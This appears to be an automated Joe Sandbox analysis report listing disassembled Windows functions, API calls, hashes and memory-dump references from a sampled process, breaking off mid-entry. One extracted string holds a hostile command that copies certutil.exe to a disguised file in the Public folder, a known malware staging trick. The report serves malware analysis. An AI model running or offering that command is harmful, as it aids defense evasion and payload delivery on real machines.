                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: CurrentDebugDebuggerOutputPresentStringThread
                                        • String ID:
                                        • API String ID: 4268342597-0
                                        • Opcode ID: dd079414f8549339cb4fded4247a4dbae90aea18fcb15bc8c39707241a1b23ff
                                        • Instruction ID: 18802e845009af585dac8373c939c502d720a07f1a1386048de5869bf3eae66b
                                        • Opcode Fuzzy Hash: dd079414f8549339cb4fded4247a4dbae90aea18fcb15bc8c39707241a1b23ff
                                        • Instruction Fuzzy Hash: 95814E22B0CB8281EB65AF26A844279F7A5FB55BA4F984135CF6D03754EF3CE641C720
                                        Function 00007FF7CD4988C0 Relevance: 4.6, APIs: 3, Instructions: 68nativethreadCOMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: OpenToken$CloseProcessThread
                                        • String ID:
                                        • API String ID: 2991381754-0
                                        • Opcode ID: 4ce3de64b8687a78417f54647f77f6de0b0f09df9b2bc4953d3ae018d63077cb
                                        • Instruction ID: b148f83a734d45f71f6273bfccf4b920153737300f534dd6d75ed4d7485e68fa
                                        • Opcode Fuzzy Hash: 4ce3de64b8687a78417f54647f77f6de0b0f09df9b2bc4953d3ae018d63077cb
                                        • Instruction Fuzzy Hash: 77216D32B0C69287E700AFA9D4407BDFB65EB857B0F904135DF6942694EF78EA48CB10
                                        Function 00007FF7CD48586C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 25COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetVersion.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,?,?,?,?,?,00000000,00007FF7CD4AC59E), ref: 00007FF7CD485879
                                          • Part of subcall function 00007FF7CD4858D4: RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF7CD485903
                                          • Part of subcall function 00007FF7CD4858D4: RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF7CD485943
                                          • Part of subcall function 00007FF7CD4858D4: RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF7CD485956
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: CloseOpenQueryValueVersion
                                        • String ID: %d.%d.%05d.%d
                                        • API String ID: 2996790148-3457777122
                                        • Opcode ID: 4d5ad80169b63ecb9418821cd297058139bf77423c780748cae3bcfdcd848c3f
                                        • Instruction ID: 57a0bd3d4536194e0eedd8cf0bf29e23db072fa864f1a048413ffbf5e5428583
                                        • Opcode Fuzzy Hash: 4d5ad80169b63ecb9418821cd297058139bf77423c780748cae3bcfdcd848c3f
                                        • Instruction Fuzzy Hash: 08F0A771B0C78197D310AF66B44406AF651FB887D0F944138DE5907B59DF3CD614CB50
                                        Function 00007FF7CD497854 Relevance: 3.3, APIs: 2, Instructions: 296COMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: memset$ErrorFileFindFirstLast
                                        • String ID:
                                        • API String ID: 2831795651-0
                                        • Opcode ID: 43a4daf2934dc4b37ff691b1a4b1263eebb1773a1fb1ad015dd0d80b276b2dc6
                                        • Instruction ID: a7589593bd7c36986aa624acc248b450844a0b29b7ba05ab9c4f225ef977c75a
                                        • Opcode Fuzzy Hash: 43a4daf2934dc4b37ff691b1a4b1263eebb1773a1fb1ad015dd0d80b276b2dc6
                                        • Instruction Fuzzy Hash: ABD1C57270C68186E760AF22E4406BAB7A6FB447A8F905135DF6E07794EF3CDA41C710
                                        Function 00007FF7CD487D30 Relevance: 3.3, APIs: 2, Instructions: 252COMMON
                                        Download Yara Rule
                                        APIs
                                        • memset.MSVCRT ref: 00007FF7CD487DA1
                                          • Part of subcall function 00007FF7CD49417C: GetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF7CD4941AD
                                          • Part of subcall function 00007FF7CD48D3F0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF7CD48D46E
                                          • Part of subcall function 00007FF7CD48D3F0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF7CD48D485
                                          • Part of subcall function 00007FF7CD48D3F0: wcschr.MSVCRT ref: 00007FF7CD48D4EE
                                          • Part of subcall function 00007FF7CD48D3F0: iswspace.MSVCRT ref: 00007FF7CD48D54D
                                          • Part of subcall function 00007FF7CD48D3F0: wcschr.MSVCRT ref: 00007FF7CD48D569
                                          • Part of subcall function 00007FF7CD48D3F0: wcschr.MSVCRT ref: 00007FF7CD48D58C
                                        • ??_V@YAXPEAX@Z.MSVCRT ref: 00007FF7CD487EB7
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: wcschr$Heapmemset$AllocCurrentDirectoryProcessiswspace
                                        • String ID:
                                        • API String ID: 168394030-0
                                        • Opcode ID: a65c63928f551fb8768bc8e3d10b498b84304c82453fdb636945e23039fb0caa
                                        • Instruction ID: f8131d008688b938a6b17fca2f1a4d11fd53a46948c06f1bc5ac3527d19afa75
                                        • Opcode Fuzzy Hash: a65c63928f551fb8768bc8e3d10b498b84304c82453fdb636945e23039fb0caa
                                        • Instruction Fuzzy Hash: 88A1F621B1CA4285FB64BF2698506B9A392BF857A4F804135DF2E876E5FF3CE6058310
                                        Function 00007FF7CD4989E4 Relevance: 3.0, APIs: 2, Instructions: 43nativeCOMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: InformationQueryToken
                                        • String ID:
                                        • API String ID: 4239771691-0
                                        • Opcode ID: ea3ebf219b67d46e5b1987a5c063cf7b613a027b1816fa6f4767aceb48b770b4
                                        • Instruction ID: b5e61d702ec6bb4428a5d00bc3d7179e4993fe37bc4c7e1ca3067d33fa07a06f
                                        • Opcode Fuzzy Hash: ea3ebf219b67d46e5b1987a5c063cf7b613a027b1816fa6f4767aceb48b770b4
                                        • Instruction Fuzzy Hash: EF11707270C781CBEB109F12E4007A9FBA9FB947A5F404131DF5802A94EB7DE688CB60
                                        Function 00007FF7CD498114 Relevance: 3.0, APIs: 2, Instructions: 41filenativeCOMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: FileInformation$HandleQueryVolume
                                        • String ID:
                                        • API String ID: 2149833895-0
                                        • Opcode ID: 625d3b3e026192d6aa05ab746e3d747582aa1c91c48dbe730e9190b973acbc48
                                        • Instruction ID: d8cf5a1dc9dfdaae3e85dac23042a28bfcd4c2c9cf66280bb4837c6f374a4373
                                        • Opcode Fuzzy Hash: 625d3b3e026192d6aa05ab746e3d747582aa1c91c48dbe730e9190b973acbc48
                                        • Instruction Fuzzy Hash: 6F11C13270C68186E7209F51F0417AAF7A1FB44B54F804131DFAD42A58EFBCD948CB10
                                        Function 00007FF7CD4A8654 Relevance: 3.0, APIs: 2, Instructions: 39timeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetSystemTime.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,?,?,?,?,?,00000000,00007FF7CD4A4227), ref: 00007FF7CD4A8678
                                        • SystemTimeToFileTime.API-MS-WIN-CORE-TIMEZONE-L1-1-0(?,?,?,?,?,?,00000000,00007FF7CD4A4227), ref: 00007FF7CD4A86D4
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: Time$System$File
                                        • String ID:
                                        • API String ID: 2838179519-0
                                        • Opcode ID: 62ebdb23c5db016c2826862ffbff753f6fa70ff692e943220732cd29ca21f8c9
                                        • Instruction ID: 11ad356e9a6df08d54e35091ff7eec6f6140c7ef2ef28cb07bc5a158566ea32d
                                        • Opcode Fuzzy Hash: 62ebdb23c5db016c2826862ffbff753f6fa70ff692e943220732cd29ca21f8c9
                                        • Instruction Fuzzy Hash: 9B115E56618680C6D7249F66E00013AF370FFACB19B545122FE9D82764FB3CC642CB28
                                        Function 00007FF7CD488510 Relevance: 1.7, APIs: 1, Instructions: 177COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00007FF7CD48D3F0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF7CD48D46E
                                          • Part of subcall function 00007FF7CD48D3F0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF7CD48D485
                                          • Part of subcall function 00007FF7CD48D3F0: wcschr.MSVCRT ref: 00007FF7CD48D4EE
                                          • Part of subcall function 00007FF7CD48D3F0: iswspace.MSVCRT ref: 00007FF7CD48D54D
                                          • Part of subcall function 00007FF7CD48D3F0: wcschr.MSVCRT ref: 00007FF7CD48D569
                                          • Part of subcall function 00007FF7CD48D3F0: wcschr.MSVCRT ref: 00007FF7CD48D58C
                                        • towupper.MSVCRT ref: 00007FF7CD4885D4
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: wcschr$Heap$AllocProcessiswspacetowupper
                                        • String ID:
                                        • API String ID: 3520273530-0
                                        • Opcode ID: 4bf984449d6576c9e1357fbba499d80d7c4b4475721f5272d0d4c1e3d8a5570f
                                        • Instruction ID: 78578aebde69f18ec5c496cb310a212fac845c20a4c7e66b587c845a56b1eb55
                                        • Opcode Fuzzy Hash: 4bf984449d6576c9e1357fbba499d80d7c4b4475721f5272d0d4c1e3d8a5570f
                                        • Instruction Fuzzy Hash: 7961C321B1C20285E764BE25E944779F6A1FB047B4FC08136DF3E962D5EF3CAA808321
                                        Function 00007FF7CD49898C Relevance: 1.5, APIs: 1, Instructions: 24nativeCOMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: InformationQueryToken
                                        • String ID:
                                        • API String ID: 4239771691-0
                                        • Opcode ID: 7517614d59da3da2d62857270a17558918b7290ddd6fc4d467c09f47fe27c059
                                        • Instruction ID: 86df182905fd49ec473f8129e1ce23b0907d6280a03b7e7d5b675f79d496c987
                                        • Opcode Fuzzy Hash: 7517614d59da3da2d62857270a17558918b7290ddd6fc4d467c09f47fe27c059
                                        • Instruction Fuzzy Hash: 78F01CB3704B81CBD7009F65E58889CBB78F754B94B95853ACF2803704EB75DAA4CB50
                                        Function 00007FF7CD4993B0 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                        Download Yara Rule
                                        APIs
                                        • SetUnhandledExceptionFilter.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7CD4993BB
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: ExceptionFilterUnhandled
                                        • String ID:
                                        • API String ID: 3192549508-0
                                        • Opcode ID: eff4557ae00fe4591a940a5480948ed29a826f3915cdbc5be4334919315eb20c
                                        • Instruction ID: 385f7ae384bfca10f038a4906c284339e55c12bb0fe179a327bac6f84f02feb3
                                        • Opcode Fuzzy Hash: eff4557ae00fe4591a940a5480948ed29a826f3915cdbc5be4334919315eb20c
                                        • Instruction Fuzzy Hash: 14B09210F29802E1DA04BF629C850A062A16BAC720FC01831CA1E80160EE1CA29B8710
                                        Function 00007FF7CD48F8C0 Relevance: 40.6, APIs: 21, Strings: 2, Instructions: 380COMMON
                                        Download Yara Rule
                                        APIs
                                        • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,00000000,?,00007FF7CD48F52A,00000000,00000000,?,00000000,?,00007FF7CD48E626,?,?,00000000,00007FF7CD491F69), ref: 00007FF7CD48F8DE
                                        • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000000,00007FF7CD491F69,?,?,?,?,?,?,?,00007FF7CD48286E,00000000,00000000,00000000,00000000), ref: 00007FF7CD48F8FB
                                        • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000000,00007FF7CD491F69,?,?,?,?,?,?,?,00007FF7CD48286E,00000000,00000000,00000000,00000000), ref: 00007FF7CD48F951
                                        • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000000,00007FF7CD491F69,?,?,?,?,?,?,?,00007FF7CD48286E,00000000,00000000,00000000,00000000), ref: 00007FF7CD48F96B
                                        • wcschr.MSVCRT(?,?,00000000,00007FF7CD491F69,?,?,?,?,?,?,?,00007FF7CD48286E,00000000,00000000,00000000,00000000), ref: 00007FF7CD48FA8E
                                        • _get_osfhandle.MSVCRT ref: 00007FF7CD48FB14
                                        • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000000,00007FF7CD491F69,?,?,?,?,?,?,?,00007FF7CD48286E,00000000,00000000,00000000,00000000), ref: 00007FF7CD48FB2D
                                        • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,00000000,00007FF7CD491F69,?,?,?,?,?,?,?,00007FF7CD48286E,00000000,00000000,00000000,00000000), ref: 00007FF7CD48FBEA
                                        • _get_osfhandle.MSVCRT ref: 00007FF7CD48F996
                                          • Part of subcall function 00007FF7CD490010: SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00000000,0000237B,00000000,00000002,0000000A,00000001,00007FF7CD4A849D,?,?,?,00007FF7CD4AF0C7), ref: 00007FF7CD490045
                                          • Part of subcall function 00007FF7CD490010: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,00007FF7CD4AF0C7,?,?,?,?,0000000A,?,00000002,00000000,?,?,0000002F,00007FF7CD4AE964), ref: 00007FF7CD490071
                                          • Part of subcall function 00007FF7CD490010: ReadFile.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7CD490092
                                          • Part of subcall function 00007FF7CD490010: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00007FF7CD4900A7
                                          • Part of subcall function 00007FF7CD490010: MultiByteToWideChar.API-MS-WIN-CORE-STRING-L1-1-0 ref: 00007FF7CD490181
                                        • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000000,00007FF7CD491F69,?,?,?,?,?,?,?,00007FF7CD48286E,00000000,00000000,00000000,00000000), ref: 00007FF7CD49D401
                                        • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000000,00007FF7CD491F69,?,?,?,?,?,?,?,00007FF7CD48286E,00000000,00000000,00000000,00000000), ref: 00007FF7CD49D41B
                                        • longjmp.MSVCRT(?,?,00000000,00007FF7CD491F69,?,?,?,?,?,?,?,00007FF7CD48286E,00000000,00000000,00000000,00000000), ref: 00007FF7CD49D435
                                        • longjmp.MSVCRT(?,?,00000000,00007FF7CD491F69,?,?,?,?,?,?,?,00007FF7CD48286E,00000000,00000000,00000000,00000000), ref: 00007FF7CD49D480
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: CriticalSection$EnterFileLeave$LockPointerShared_get_osfhandlelongjmp$AcquireByteCharErrorLastMultiReadReleaseWidewcschr
                                        • String ID: =,;$extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
                                        • API String ID: 3964947564-518410914
                                        • Opcode ID: ac10f6592d03a1150df86db3bbd316513fcc4d2075019832c3c795bce2986d35
                                        • Instruction ID: 8b88993acd5eeb26be7195c256e3f4d3ef26f4493d50f06a708b12f30c8ee902
                                        • Opcode Fuzzy Hash: ac10f6592d03a1150df86db3bbd316513fcc4d2075019832c3c795bce2986d35
                                        • Instruction Fuzzy Hash: B8026D21B0DA0296EA54BF22A844578F6A6FF957B5FD44135DF2E83294FF3DA600C720
                                        Function 00007FF7CD4902A0 Relevance: 35.3, APIs: 13, Strings: 7, Instructions: 279COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: _wcsicmp$iswspacewcschr
                                        • String ID: ;$=,;$FOR$FOR/?$IF/?$REM$REM/?
                                        • API String ID: 840959033-3627297882
                                        • Opcode ID: a685c2dfbfb933869e1ee9a5fd26f57dd0ea790cc444f73fb6d6a268455a5bb9
                                        • Instruction ID: 0e766ec1bde537315bd42960f145fc138c41d00b1f24689f8505c9d1c53c77cc
